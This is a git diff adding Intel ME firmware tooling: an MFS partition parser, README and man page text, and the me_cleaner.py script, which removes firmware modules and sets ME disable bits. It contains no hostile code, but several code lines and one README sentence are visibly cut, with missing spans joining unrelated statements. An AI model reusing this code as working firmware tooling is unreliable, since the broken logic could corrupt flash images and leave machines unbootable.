// MFS.CHUNKS_PER_DATA_PAGE + chunk = data_pages[page_idx].getChunk(self.total_chunks + data_chunk_idx) + next_chain = self.data_ids[data_chunk_idx] + size = MFS.CHUNK_SIZE if next_chain > MFS.CHUNK_SIZE else next_chain + self.files[id].addChunk(chunk, size) + if next_chain <= MFS.CHUNK_SIZE: + break + chain = next_chain + + @property + def numFiles(self): + return self.num_files + + def getFile(self, id): + if id >= 0 and id <= self.num_files: + return self.files[id] + return None + + def iterateFiles(self): + for id in range(self.num_files): + if self.files[id]: + yield self.files[id] + + def removeFile(self, id): + if id < 0 or id > self.num_files: + return + file = self.files[id] + if file is None: + return + self.files[id] = None + chain = self.file_ids[id] + self.file_ids[id] = 0 + while chain > MFS.CHUNK_SIZE: + next_chain = self.data_ids[chain - self.num_files] + self.data_ids[chain - self.num_files] = 0 + chain = next_chain + + def addFile(self, id, data, optimize=True): + self.removeFile(id) + file = MFSFile(id) + size = len(data) + 
data_chain = [] + for offset in range(0, size, MFS.CHUNK_SIZE): + if optimize: + chain = self.getNextFreeDataChunk() + else: + chain = self.getLastFreeDataChunk() + if chain == -1: + # If not enough space, free previously set chains + for chain in data_chain: + self.data_ids[chain] = 0 + return False + file.addData(self.total_chunks + chain, data[offset:offset+MFS.CHUNK_SIZE]) + if len(data_chain) > 0: + self.data_ids[data_chain[-1]] = chain + self.num_files + data_chain.append(chain) + self.data_ids[chain] = size - offset + if len(data_chain) > 0: + self.file_ids[id] = data_chain[0] + self.num_files + else: + # Empty file + self.file_ids[id] = 0xFFFF + self.files[id] = file + + def getNextFreeDataChunk(self): + for i, chain in enumerate(self.data_ids): + if chain == 0: + return i + return -1 + + def getLastFreeDataChunk(self): + for i, chain in reversed(list(enumerate(self.data_ids))): + if chain == 0: + return i + return -1 + + def generate(self): + data = self.SYSTEM_VOLUME_HEADER_FMT.pack(self.signature, self.version, self.capacity, self.num_files) + \ + struct.pack("<%dH" % self.num_files, *self.file_ids) + \ + struct.pack("<%dH" % len (self.data_ids), *self.data_ids) + total_data_size = (len(data) + MFS.CHUNK_SIZE - 1) & ~(MFS.CHUNK_SIZE - 1) + self.data = data.ljust(total_data_size, b'\0') + + def generateChunks(self): + self.generate() + empty_data = b'\0' * MFS.CHUNK_SIZE + chunks = [] + for offset in range(0, len(self.data), MFS.CHUNK_SIZE): + data = self.data[offset:offset + MFS.CHUNK_SIZE] + if data == empty_data: + continue + chunk = MFSChunk(data, offset // MFS.CHUNK_SIZE, False) + chunks.append(chunk) + return chunks + + def _listDirRecursive(self, file, integrity, prefix): + for dirent in file.decodeDir(integrity): + # Skip relative references + if dirent.name == "." 
or dirent.name == "..": + continue + # Absolute path to this file + path = prefix + "/" + dirent.name + file = self.getFile(dirent.id()) + # Yield field itself + yield path, file.decodeData(dirent.integrity()) + # Recursively yield entries if it is a subdirectory + if dirent.directory(): + yield from self._listDirRecursive(file, dirent.integrity(), prefix=path) + + def listDir(self, id, integrity, prefix): + file = self.getFile(id) + # Yield the root itself + yield prefix, file.decodeData(integrity) + # List its subdirectories + yield from self._listDirRecursive(file, integrity, prefix) + + def __str__(self): + res = f"Total of {self.num_files} file entries\n" + for i, f in enumerate(self.files): + if f: + res += f"{i}: {f}\n" + return res + +DIRECTORY_ENTRY_SIZE = 24 +INTEGRITY_BLOB_SIZE = 52 + +class MFSFile(object): + def __init__(self, id): + self.id = id + self.chain = [] + self.data = b"" + + def addChunk(self, chunk, size): + self.chain.append(chunk.id) + self.data = self.data + chunk.data[:size] + + def addData(self, id, data): + self.chain.append(id) + self.data = self.data + data + + def generateChunks(self): + chunks = [] + for i, chain in enumerate(self.chain): + data = self.data[i * MFS.CHUNK_SIZE:(i + 1) * MFS.CHUNK_SIZE] + data = data.ljust(MFS.CHUNK_SIZE, b'\0') + chunk = MFSChunk(data, chain, False) + chunks.append(chunk) + return chunks + + def decodeData(self, integrity): + if integrity: + return self.data[:-INTEGRITY_BLOB_SIZE] + return self.data + + def decodeDir(self, integrity): + data = self.decodeData(integrity) + # Decode directory entries + for i in range(0, len(data), DIRECTORY_ENTRY_SIZE): + yield MFSDirectoryEntry(data[i:i + DIRECTORY_ENTRY_SIZE]) + + def __str__(self): + return f"File {self.id} has {len(self.data)} bytes (Chain: {self.chain})" + +class MFSDirectoryEntry: + FILE = 0 + DIR = 1 + + def __init__(self, data): + self.fileno, self.mode, self.uid, self.gid, self.salt, self.name = \ + struct.unpack("= 11) the ME subsystem and the firmware +structure have changed, requiring substantial changes in _me\_cleaner_. +The fundamental modules required for the correct boot are now four (`rbe`, +`kernel`, `syslib` and `bup`) and the minimum code size is ~300 kB of compressed +code (from the 2 MB of the non-AMT firmware and the 7 MB of the AMT one). + +On some boards the OEM firmware fails to boot without a valid Intel ME firmware; +in the other cases the system should work with minor inconveniences (like longer +boot times or warning messages) or without issues at all. + +Obviously, the features provided by Intel ME won't be functional anymore after +the modifications. + +## Documentation + +The detailed documentation about the working of _me\_cleaner_ can be found on +the page ["How does it work?" page]( +https://github.com/corna/me_cleaner/wiki/How-does-it-work%3F). + +Various guides and tutorials are available on the Internet, however a good +starting point is the ["How to apply me_cleaner" guide]( +https://github.com/corna/me_cleaner/wiki/How-to-apply-me_cleaner). 
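
A minimal sanity-check sketch, not part of me_cleaner or of this patch: after cleaning an ME >= 11 image, one can crudely confirm from the outside that the four essential module names mentioned above (and kept by me_cleaner's own `unremovable_modules_me11` list) still occur in the output. The file name below is only an example.

```python
# Illustrative, crude check only (substring search over the whole image,
# so false positives are possible); assumes a cleaned ME-only image on disk.
ESSENTIAL_ME11_MODULES = (b"rbe", b"kernel", b"syslib", b"bup")

def essential_modules_present(image_path):
    with open(image_path, "rb") as f:
        data = f.read()
    # All four names should still be present somewhere in the cleaned image.
    return all(name in data for name in ESSENTIAL_ME11_MODULES)

# Example usage (hypothetical file name):
#   essential_modules_present("modified_me_firmware.bin")  # -> True or False
```
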
diff --git a/blobs/t480/me_cleaner/description.md b/blobs/t480/me_cleaner/description.md new file mode 100644 index 00000000..d5de2d5c --- /dev/null +++ b/blobs/t480/me_cleaner/description.md @@ -0,0 +1,2 @@ +__[me_cleaner](https://github.com/corna/me_cleaner)__ - Tool for +partial deblobbing of Intel ME/TXE firmware images `Python` diff --git a/blobs/t480/me_cleaner/man/me_cleaner.1 b/blobs/t480/me_cleaner/man/me_cleaner.1 new file mode 100644 index 00000000..8edd2262 --- /dev/null +++ b/blobs/t480/me_cleaner/man/me_cleaner.1 @@ -0,0 +1,157 @@ +.TH me_cleaner 1 "JUNE 2018" +.SH me_cleaner +.PP +me_cleaner \- Tool for partial deblobbing of Intel ME/TXE firmware images +.SH SYNOPSIS +.PP +\fB\fCme_cleaner.py\fR [\-h] [\-v] [\-O output_file] [\-S | \-s] [\-r] [\-k] +[\-w whitelist | \-b blacklist] [\-d] [\-t] [\-c] [\-D output_descriptor] +[\-M output_me_image] \fIfile\fP +.SH DESCRIPTION +.PP +\fB\fCme_cleaner\fR is a tool able to disable parts of Intel ME/TXE by: +.RS +.IP \(bu 2 +removing most of the code from its firmware +.IP \(bu 2 +setting a special bit to force it to disable itself after the hardware +initialization +.RE +.PP +Using both the modes seems to be the most reliable way on many platforms. +.PP +The resulting modified firmware needs to be flashed (in most of the cases) with +an external programmer, often a dedicated SPI programmer or a Linux board with +a SPI master interface. +.PP +\fB\fCme_cleaner\fR works at least from Nehalem to Coffee Lake (for Intel ME) and on +Braswell/Cherry Trail (for Intel TXE), but may work as well on newer or +different architectures. +.PP +While \fB\fCme_cleaner\fR have been tested on a great number of platforms, fiddling +with the Intel ME/TXE firmware is \fIvery dangerous\fP and can easily lead to a +dead PC. +.PP +\fIYOU HAVE BEEN WARNED.\fP +.SH POSITIONAL ARGUMENTS +.TP +\fB\fCfile\fR +ME/TXE image or full dump. +.SH OPTIONAL ARGUMENTS +.TP +\fB\fC\-h\fR, \fB\fC\-\-help\fR +Show the help message and exit. +.TP +\fB\fC\-v\fR, \fB\fC\-\-version\fR +Show program's version number and exit. +.TP +\fB\fC\-O\fR, \fB\fC\-\-output\fR +Save the modified image in a separate file, instead of modifying the +original file. +.TP +\fB\fC\-S\fR, \fB\fC\-\-soft\-disable\fR +In addition to the usual operations on the ME/TXE firmware, set the +MeAltDisable bit or the HAP bit to ask Intel ME/TXE to disable itself after +the hardware initialization (requires a full dump). +.TP +\fB\fC\-s\fR, \fB\fC\-\-soft\-disable\-only\fR +Instead of the usual operations on the ME/TXE firmware, just set the +MeAltDisable bit or the HAP bit to ask Intel ME/TXE to disable itself after +the hardware initialization (requires a full dump). +.TP +\fB\fC\-r\fR, \fB\fC\-\-relocate\fR +Relocate the FTPR partition to the top of the ME region to save even more +space. +.TP +\fB\fC\-t\fR, \fB\fC\-\-truncate\fR +Truncate the empty part of the firmware (requires a separated ME/TXE image or +\fB\fC\-\-extract\-me\fR). +.TP +\fB\fC\-k\fR, \fB\fC\-\-keep\-modules\fR +Don't remove the FTPR modules, even when possible. +.TP +\fB\fC\-w\fR, \fB\fC\-\-whitelist\fR +Comma separated list of additional partitions to keep in the final image. +This can be used to specify the MFS partition for example, which stores PCIe +and clock settings. +.TP +\fB\fC\-b\fR, \fB\fC\-\-blacklist\fR +Comma separated list of partitions to remove from the image. This option +overrides the default removal list. 
+.TP +\fB\fC\-d\fR, \fB\fC\-\-descriptor\fR +Remove the ME/TXE Read/Write permissions to the other regions on the flash +from the Intel Flash Descriptor (requires a full dump). +.TP +\fB\fC\-D\fR, \fB\fC\-\-extract\-descriptor\fR +Extract the flash descriptor from a full dump; when used with \fB\fC\-\-truncate\fR +save a descriptor with adjusted regions start and end. +.TP +\fB\fC\-M\fR, \fB\fC\-\-extract\-me\fR +Extract the ME firmware from a full dump; when used with \fB\fC\-\-truncate\fR save a +truncated ME/TXE image. +.TP +\fB\fC\-c\fR, \fB\fC\-\-check\fR +Verify the integrity of the fundamental parts of the firmware and exit. +.SH SUPPORTED PLATFORMS +.PP +Currently \fB\fCme_cleaner\fR has been tested on the following platforms: +.TS +allbox; +cb cb cb cb +c c c c +c c c c +c c c c +c c c c +c c c c +c c c c +c c c c +c c c c +. +PCH CPU ME SKU +Ibex Peak Nehalem/Westmere 6.0 Ignition +Ibex Peak Nehalem/Westmere 6.x 1.5/5 MB +Cougar Point Sandy Bridge 7.x 1.5/5 MB +Panther Point Ivy Bridge 8.x 1.5/5 MB +Lynx/Wildcat Point Haswell/Broadwell 9.x 1.5/5 MB +Wildcat Point LP Broadwell Mobile 10.0 1.5/5 MB +Sunrise Point Skylake/Kabylake 11.x CON/COR +Union Point Kabylake 11.x CON/COR +.TE +.TS +allbox; +cb cb cb +c c c +. +SoC TXE SKU +Braswell/Cherry Trail 2.x 1.375 MB +.TE +.PP +All the reports are available on the project's GitHub page \[la]https://github.com/corna/me_cleaner/issues/3\[ra]\&. +.SH EXAMPLES +.PP +Check whether the provided image has a valid structure and signature: +.IP +\fB\fCme_cleaner.py \-c dumped_firmware.bin\fR +.PP +Remove most of the Intel ME firmware modules but don't set the HAP/AltMeDisable +bit: +.IP +\fB\fCme_cleaner.py \-S \-O modified_me_firmware.bin dumped_firmware.bin\fR +.PP +Remove most of the Intel ME firmware modules and set the HAP/AltMeDisable bit, +disable the Read/Write access of Intel ME to the other flash region, then +relocate the code to the top of the image and truncate it, extracting a modified +descriptor and ME image: +.IP +\fB\fCme_cleaner.py \-S \-r \-t \-d \-D ifd_shrinked.bin \-M me_shrinked.bin \-O modified_firmware.bin full_dumped_firmware.bin\fR +.SH BUGS +.PP +Bugs should be reported on the project's GitHub page \[la]https://github.com/corna/me_cleaner\[ra]\&. 
+.SH AUTHOR +.PP +Nicola Corna \[la]nicola@corna.info\[ra] +.SH SEE ALSO +.PP +.BR flashrom (8), +me_cleaner's Wiki \[la]https://github.com/corna/me_cleaner/wiki\[ra] diff --git a/blobs/t480/me_cleaner/me_cleaner.py b/blobs/t480/me_cleaner/me_cleaner.py new file mode 100755 index 00000000..fae5e567 --- /dev/null +++ b/blobs/t480/me_cleaner/me_cleaner.py @@ -0,0 +1,884 @@ +#!/usr/bin/env python +# me_cleaner - Tool for partial deblobbing of Intel ME/TXE firmware images +# SPDX-License-Identifier: GPL-3.0-or-later + +from __future__ import division, print_function + +import argparse +import binascii +import hashlib +import itertools +import shutil +import sys +from struct import pack, unpack + + +min_ftpr_offset = 0x400 +spared_blocks = 4 +unremovable_modules = ("ROMP", "BUP") +unremovable_modules_me11 = ("rbe", "kernel", "syslib", "bup") +unremovable_partitions = ("FTPR",) + +pubkeys_md5 = { + "763e59ebe235e45a197a5b1a378dfa04": ("ME", ("6.x.x.x",)), + "3a98c847d609c253e145bd36512629cb": ("ME", ("6.0.50.x",)), + "0903fc25b0f6bed8c4ed724aca02124c": ("ME", ("7.x.x.x", "8.x.x.x")), + "2011ae6df87c40fba09e3f20459b1ce0": ("ME", ("9.0.x.x", "9.1.x.x")), + "e8427c5691cf8b56bc5cdd82746957ed": ("ME", ("9.5.x.x", "10.x.x.x")), + "986a78e481f185f7d54e4af06eb413f6": ("ME", ("11.x.x.x",)), + "bda0b6bb8ca0bf0cac55ac4c4d55e0f2": ("TXE", ("1.x.x.x",)), + "b726a2ab9cd59d4e62fe2bead7cf6997": ("TXE", ("1.x.x.x",)), + "0633d7f951a3e7968ae7460861be9cfb": ("TXE", ("2.x.x.x",)), + "1d0a36e9f5881540d8e4b382c6612ed8": ("TXE", ("3.x.x.x",)), + "be900fef868f770d266b1fc67e887e69": ("SPS", ("2.x.x.x",)), + "4622e3f2cb212a89c90a4de3336d88d2": ("SPS", ("3.x.x.x",)), + "31ef3d950eac99d18e187375c0764ca4": ("SPS", ("4.x.x.x",)) +} + + +class OutOfRegionException(Exception): + pass + + +class RegionFile: + def __init__(self, f, region_start, region_end): + self.f = f + self.region_start = region_start + self.region_end = region_end + + def read(self, n): + if f.tell() + n <= self.region_end: + return self.f.read(n) + else: + raise OutOfRegionException() + + def readinto(self, b): + if f.tell() + len(b) <= self.region_end: + return self.f.readinto(b) + else: + raise OutOfRegionException() + + def seek(self, offset): + if self.region_start + offset <= self.region_end: + return self.f.seek(self.region_start + offset) + else: + raise OutOfRegionException() + + def write_to(self, offset, data): + if self.region_start + offset + len(data) <= self.region_end: + self.f.seek(self.region_start + offset) + return self.f.write(data) + else: + raise OutOfRegionException() + + def fill_range(self, start, end, fill): + if self.region_start + end <= self.region_end: + if start < end: + block = fill * 4096 + self.f.seek(self.region_start + start) + self.f.writelines(itertools.repeat(block, + (end - start) // 4096)) + self.f.write(block[:(end - start) % 4096]) + else: + raise OutOfRegionException() + + def fill_all(self, fill): + self.fill_range(0, self.region_end - self.region_start, fill) + + def move_range(self, offset_from, size, offset_to, fill): + if self.region_start + offset_from + size <= self.region_end and \ + self.region_start + offset_to + size <= self.region_end: + for i in range(0, size, 4096): + self.f.seek(self.region_start + offset_from + i, 0) + block = self.f.read(min(size - i, 4096)) + self.f.seek(self.region_start + offset_from + i, 0) + self.f.write(fill * len(block)) + self.f.seek(self.region_start + offset_to + i, 0) + self.f.write(block) + else: + raise OutOfRegionException() + + def save(self, filename, size): + if 
self.region_start + size <= self.region_end: + self.f.seek(self.region_start) + copyf = open(filename, "w+b") + for i in range(0, size, 4096): + copyf.write(self.f.read(min(size - i, 4096))) + return copyf + else: + raise OutOfRegionException() + + +def get_chunks_offsets(llut): + chunk_count = unpack("> 4) & 7 + + print(" {:<16} ({:<7}, ".format(name, comp_str[comp_type]), end="") + + if comp_type == 0x00 or comp_type == 0x02: + print("0x{:06x} - 0x{:06x} ): " + .format(offset, offset + size), end="") + + if name in unremovable_modules: + end_addr = max(end_addr, offset + size) + print("NOT removed, essential") + else: + end = min(offset + size, me_end) + f.fill_range(offset, end, b"\xff") + print("removed") + + elif comp_type == 0x01: + if not chunks_offsets: + f.seek(offset) + llut = f.read(4) + if llut == b"LLUT": + llut += f.read(0x3c) + + chunk_count = unpack(" removable_chunk[0]: + end = min(removable_chunk[1], me_end) + f.fill_range(removable_chunk[0], end, b"\xff") + + end_addr = max(end_addr, + max(unremovable_huff_chunks, key=lambda x: x[1])[1]) + + return end_addr + + +def check_partition_signature(f, offset): + f.seek(offset) + header = f.read(0x80) + modulus = int(binascii.hexlify(f.read(0x100)[::-1]), 16) + public_exponent = unpack("> 4) & 7 == 0x01: + llut_start = unpack("> 25 + + modules.append((name, offset, comp_type)) + + modules.sort(key=lambda x: x[1]) + + for i in range(0, module_count): + name = modules[i][0] + offset = partition_offset + modules[i][1] + end = partition_offset + modules[i + 1][1] + removed = False + + if name.endswith(".man") or name.endswith(".met"): + compression = "uncompressed" + else: + compression = comp_str[modules[i][2]] + + print(" {:<12} ({:<12}, 0x{:06x} - 0x{:06x}): " + .format(name, compression, offset, end), end="") + + if name.endswith(".man"): + print("NOT removed, partition manif.") + elif name.endswith(".met"): + print("NOT removed, module metadata") + elif any(name.startswith(m) for m in unremovable_modules_me11): + print("NOT removed, essential") + else: + removed = True + f.fill_range(offset, min(end, me_end), b"\xff") + print("removed") + + if not removed: + end_data = max(end_data, end) + + if relocate: + new_offset = relocate_partition(f, me_end, 0x30, min_offset, []) + end_data += new_offset - partition_offset + partition_offset = new_offset + + return end_data, partition_offset + + +def check_mn2_tag(f, offset): + f.seek(offset + 0x1c) + tag = f.read(4) + if tag != b"$MN2": + sys.exit("Wrong FTPR manifest tag ({}), this image may be corrupted" + .format(tag)) + + +def flreg_to_start_end(flreg): + return (flreg & 0x7fff) << 12, (flreg >> 4 & 0x7fff000 | 0xfff) + 1 + + +def start_end_to_flreg(start, end): + return (start & 0x7fff000) >> 12 | ((end - 1) & 0x7fff000) << 4 + + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="Tool to remove as much code " + "as possible from Intel ME/TXE firmware " + "images") + softdis = parser.add_mutually_exclusive_group() + bw_list = parser.add_mutually_exclusive_group() + + parser.add_argument("-v", "--version", action="version", + version="%(prog)s 1.2") + + parser.add_argument("file", help="ME/TXE image or full dump") + parser.add_argument("-O", "--output", metavar='output_file', help="save " + "the modified image in a separate file, instead of " + "modifying the original file") + softdis.add_argument("-S", "--soft-disable", help="in addition to the " + "usual operations on the ME/TXE firmware, set the " + "MeAltDisable bit or the HAP bit to ask Intel ME/TXE " + 
"to disable itself after the hardware initialization " + "(requires a full dump)", action="store_true") + softdis.add_argument("-s", "--soft-disable-only", help="instead of the " + "usual operations on the ME/TXE firmware, just set " + "the MeAltDisable bit or the HAP bit to ask Intel " + "ME/TXE to disable itself after the hardware " + "initialization (requires a full dump)", + action="store_true") + parser.add_argument("-r", "--relocate", help="relocate the FTPR partition " + "to the top of the ME region to save even more space", + action="store_true") + parser.add_argument("-t", "--truncate", help="truncate the empty part of " + "the firmware (requires a separated ME/TXE image or " + "--extract-me)", action="store_true") + parser.add_argument("-k", "--keep-modules", help="don't remove the FTPR " + "modules, even when possible", action="store_true") + bw_list.add_argument("-w", "--whitelist", metavar="whitelist", + help="Comma separated list of additional partitions " + "to keep in the final image. This can be used to " + "specify the MFS partition for example, which stores " + "PCIe and clock settings.") + bw_list.add_argument("-b", "--blacklist", metavar="blacklist", + help="Comma separated list of partitions to remove " + "from the image. This option overrides the default " + "removal list.") + parser.add_argument("-d", "--descriptor", help="remove the ME/TXE " + "Read/Write permissions to the other regions on the " + "flash from the Intel Flash Descriptor (requires a " + "full dump)", action="store_true") + parser.add_argument("-D", "--extract-descriptor", + metavar='output_descriptor', help="extract the flash " + "descriptor from a full dump; when used with " + "--truncate save a descriptor with adjusted regions " + "start and end") + parser.add_argument("-M", "--extract-me", metavar='output_me_image', + help="extract the ME firmware from a full dump; when " + "used with --truncate save a truncated ME/TXE image") + parser.add_argument("-c", "--check", help="verify the integrity of the " + "fundamental parts of the firmware and exit", + action="store_true") + + args = parser.parse_args() + + if args.check and (args.soft_disable_only or args.soft_disable or + args.relocate or args.descriptor or args.truncate or args.output): + sys.exit("-c can't be used with -S, -s, -r, -d, -t or -O") + + if args.soft_disable_only and (args.relocate or args.truncate): + sys.exit("-s can't be used with -r or -t") + + if (args.whitelist or args.blacklist) and args.relocate: + sys.exit("Relocation is not yet supported with custom whitelist or " + "blacklist") + + f = open(args.file, "rb" if args.check or args.output else "r+b") + f.seek(0x10) + magic = f.read(4) + + if magic == b"$FPT": + print("ME/TXE image detected") + + if args.descriptor or args.extract_descriptor or args.extract_me or \ + args.soft_disable or args.soft_disable_only: + sys.exit("-d, -D, -M, -S and -s require a full dump") + + f.seek(0, 2) + me_start = 0 + me_end = f.tell() + mef = RegionFile(f, me_start, me_end) + + elif magic == b"\x5a\xa5\xf0\x0f": + print("Full image detected") + + if args.truncate and not args.extract_me: + sys.exit("-t requires a separated ME/TXE image (or --extract-me)") + + f.seek(0x14) + flmap0, flmap1 = unpack("> 12 & 0xff0 + fmba = (flmap1 & 0xff) << 4 + fpsba = flmap1 >> 12 & 0xff0 + + f.seek(frba) + flreg = unpack("= me_end: + sys.exit("The ME/TXE region in this image has been disabled") + + mef = RegionFile(f, me_start, me_end) + + mef.seek(0x10) + if mef.read(4) != b"$FPT": + sys.exit("The ME/TXE region 
is corrupted or missing") + + print("The ME/TXE region goes from {:#x} to {:#x}" + .format(me_start, me_end)) + else: + sys.exit("Unknown image") + + end_addr = me_end + + print("Found FPT header at {:#x}".format(mef.region_start + 0x10)) + + mef.seek(0x14) + entries = unpack("= 0: + check_mn2_tag(mef, ftpr_offset + ftpr_mn2_offset) + print("Found FTPR manifest at {:#x}" + .format(ftpr_offset + ftpr_mn2_offset)) + else: + sys.exit("Can't find the manifest of the FTPR partition") + + else: + check_mn2_tag(mef, ftpr_offset) + me11 = False + ftpr_mn2_offset = 0 + + mef.seek(ftpr_offset + ftpr_mn2_offset + 0x24) + version = unpack("= 6: + variant = "ME" + else: + variant = "TXE" + print("WARNING Unknown public key {}\n" + " Assuming Intel {}\n" + " Please report this warning to the project's maintainer!" + .format(pubkey_md5, variant)) + + if not args.check and args.output: + f.close() + shutil.copy(args.file, args.output) + f = open(args.output, "r+b") + + mef = RegionFile(f, me_start, me_end) + + if me_start > 0: + fdf = RegionFile(f, fd_start, fd_end) + + if me11: + fdf.seek(fpsba) + pchstrp0 = unpack(" me_end: + print(" {:<4} ({:^24}, 0x{:08x} total bytes): nothing to " + "remove" + .format(part_name, "no data here", part_length)) + else: + print(" {:<4} (0x{:08x} - 0x{:09x}, 0x{:08x} total bytes): " + .format(part_name, part_start, part_end, part_length), + end="") + if part_name in whitelist or (blacklist and + part_name not in blacklist): + unremovable_part_fpt += partition + if part_name != "FTPR": + extra_part_end = max(extra_part_end, part_end) + print("NOT removed") + else: + mef.fill_range(part_start, part_end, b"\xff") + print("removed") + + print("Removing partition entries in FPT...") + mef.write_to(0x30, unremovable_part_fpt) + mef.write_to(0x14, + pack("= 11 (except for + # 0x1b, the checksum itself). In other words, the sum of those + # bytes must be always 0x00. + mef.write_to(0x1b, pack("B", checksum)) + + print("Reading FTPR modules list...") + if me11: + end_addr, ftpr_offset = \ + check_and_remove_modules_me11(mef, me_end, + ftpr_offset, ftpr_length, + min_ftpr_offset, + args.relocate, + args.keep_modules) + else: + end_addr, ftpr_offset = \ + check_and_remove_modules(mef, me_end, ftpr_offset, + min_ftpr_offset, args.relocate, + args.keep_modules) + + if end_addr > 0: + end_addr = max(end_addr, extra_part_end) + end_addr = (end_addr // 0x1000 + 1) * 0x1000 + end_addr += spared_blocks * 0x1000 + + print("The ME minimum size should be {0} bytes " + "({0:#x} bytes)".format(end_addr)) + + if me_start > 0: + print("The ME region can be reduced up to:\n" + " {:08x}:{:08x} me" + .format(me_start, me_start + end_addr - 1)) + elif args.truncate: + print("Truncating file at {:#x}...".format(end_addr)) + f.truncate(end_addr) + + if args.soft_disable or args.soft_disable_only: + if me11: + print("Setting the HAP bit in PCHSTRP0 to disable Intel ME...") + pchstrp0 |= (1 << 16) + fdf.write_to(fpsba, pack(" {:08x}:{:08x} me" + .format(me_start, me_end - 1, + me_start, me_start + end_addr - 1)) + print(" {:08x}:{:08x} bios --> {:08x}:{:08x} bios" + .format(bios_start, bios_end - 1, + me_start + end_addr, bios_end - 1)) + + flreg1 = start_end_to_flreg(me_start + end_addr, bios_end) + flreg2 = start_end_to_flreg(me_start, me_start + end_addr) + + fdf_copy.seek(frba + 0x4) + fdf_copy.write(pack("